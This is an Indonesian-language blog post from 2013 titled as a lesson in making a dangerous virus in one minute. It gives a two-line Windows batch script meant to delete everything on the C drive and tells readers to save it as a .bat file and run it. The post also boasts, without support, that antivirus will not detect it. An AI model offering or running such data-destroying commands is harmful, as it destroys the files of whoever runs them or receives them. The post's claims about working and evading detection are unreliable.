Monday, April 22, 2013

Belajar untuk membuat bahaya virus dalam satu menit

Ya kali ini saya ingin berbagi pengetahuan yang diturunkan mastah ane ke ane.

Dalam posting ini saya akan mengajarkan Anda untuk membuat sederhana namun sangat kuat atau Anda dapat mengatakan virus komputer berbahaya menggunakan batch file. Tidak ada perangkat lunak yang diperlukan untuk membuat virus ini, Notepad sudah cukup untuk itu. Hal yang baik tentang virus ini tidak terdeteksi oleh Anti Virus.
 Apa yang akan virus ini lakukan?

Anda akan membuat virus ini menggunakan pemrograman batch berkas. Virus ini akan menghapus driver C sepenuhnya. Hal yang baik tentang virus ini adalah bahwa hal itu tidak terdeteksi oleh antivirus.

Langsung saja cara-caranya:
1.Buka notepad dan copas kode dibawah ini 

@Echo off
Del C:\ *.* |y
2. Simpan file ini sebagai virus.bat (Nama bisa apa saja tapi .bat  Adalah harus) dan jangan lupa klik All Types pada save as type
3. Sekarang, menjalankan file ini akan menghapus semua isi dari Drive C.


Selamat mencoba teman-teman .,

Ane mau lanjutin coding dulu ya.,

Newer Post Older Post Home

0 comments:

Post a Comment